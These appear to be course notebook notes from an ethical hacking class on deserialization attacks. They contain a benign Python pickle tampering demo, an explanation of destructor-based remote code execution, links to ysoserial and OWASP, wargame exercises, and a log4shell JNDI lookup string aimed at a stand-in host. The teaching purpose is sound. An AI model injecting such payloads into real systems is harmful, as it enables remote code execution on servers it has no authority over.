# Deserialization attacks

## Ethical hacking 2022

## Alessandro Bruni

# References

- [Marshalling Pickles (Slides + Video)](http://frohoff.github.io/appseccali-marshalling-pickles/)
- [ysoserial: Deserialization attack framework for Java](https://github.com/frohoff/ysoserial)
- [ysoserial.net: .NET deserialization attack framework](https://github.com/pwntester/ysoserial.net)
- [Are you my type - blackhat 2012](https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2012/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf)
- [Remote code execution on Microsoft Exchange](https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys)
- [Log4j vulnerability explained](https://www.youtube.com/watch?v=w2F67LbEtnk)
- https://blog.tneitzel.eu/posts/01-attacking-java-rmi-via-ssrf/

# Intro

- serialization/deserialization is a widely-used concept in modern languages for storing objects (structured data)

In [5]:
# example in Python:
import pickle

class A:
    def __init__(self, x):
        print("construct " + x)
        self.x = x
    
    def __del__(self):
        print("destruct " + self.x)

In [6]:
# Serialize the class
a = A("hello")
a_bytes = pickle.dumps(a)
del(a)

construct hello
destruct hello


In [8]:
# Deserialize the class
print(a_bytes)
a_bytes = a_bytes[:-5] + b'a' + a_bytes[-4:]
a = pickle.loads(a_bytes)
del(a)

b'\x80\x04\x95%\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x01A\x94\x93\x94)\x81\x94}\x94\x8c\x01x\x94\x8c\x05hello\x94sb.'
destruct hella


## The problem?

Object integrity is lost once you pass it through some untrusted channel
- give it to the user to store some temporary data (think authentication cookies stored this way)
- send over the network
- store it in a database

## The solution?

- sanity checks required: e.g. cryptographically sign serialized objects to maintain integrity
- Java (e.g. RMI) does type checking: the receiving end deserializes the object, checks the type, if the type does not match then destroy the object

## OWASP resources

- [A08:2021 – Software and Data Integrity Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures/)
- [Deserialization cheatsheet](https://www.owasp.org/index.php/Deserialization_Cheat_Sheet)

## Exercise: do Natas 26

http://natas26.natas.labs.overthewire.org/

```
username = natas26
password = oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T
```

## Remote Code Execution with destructors

- RMI receives an object of a class present in your classpath
- constructs the object, checks the type (mismatch), destroys the object
- the destructor executes arbitrary code from the user
- if anywhere in your classpath you have an object that executes arbitrary code upon destruction, you have a path to RCE

## Exercise: Deserialize to B()

[Serial.java](./code/3-deserialization/Serial.java)

## Exercise: Serial Killer

- download ysoserial
- go to 
https://github.com/archang31/aacs4-writeups/tree/master/BinaryExploitation/SerialKiller

## log4shell

```
${jndi:ldap://example.com}
```

## Exercise: exploit log4shell

- https://www.youtube.com/watch?v=iI9Dz3zN4d8
- https://github.com/LiveOverflow/log4shell

# JEP 290

- [JEP 290](http://openjdk.java.net/jeps/290)
- [Attacking Java RMI services after JEP 290](https://mogwailabs.de/de/blog/2019/03/attacking-java-rmi-services-after-jep-290/)

## CVE-2020-0688: RCE on MS Exchange

https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys


# Related vulnerabilities: injection

- OWASP page [A03:2021 - Injection](https://owasp.org/Top10/A03_2021-Injection/)

Includes
- shell injection
- SQL/NoSQL injection
- cross site scripting

![top10change](https://owasp.org/Top10/assets/mapping.png)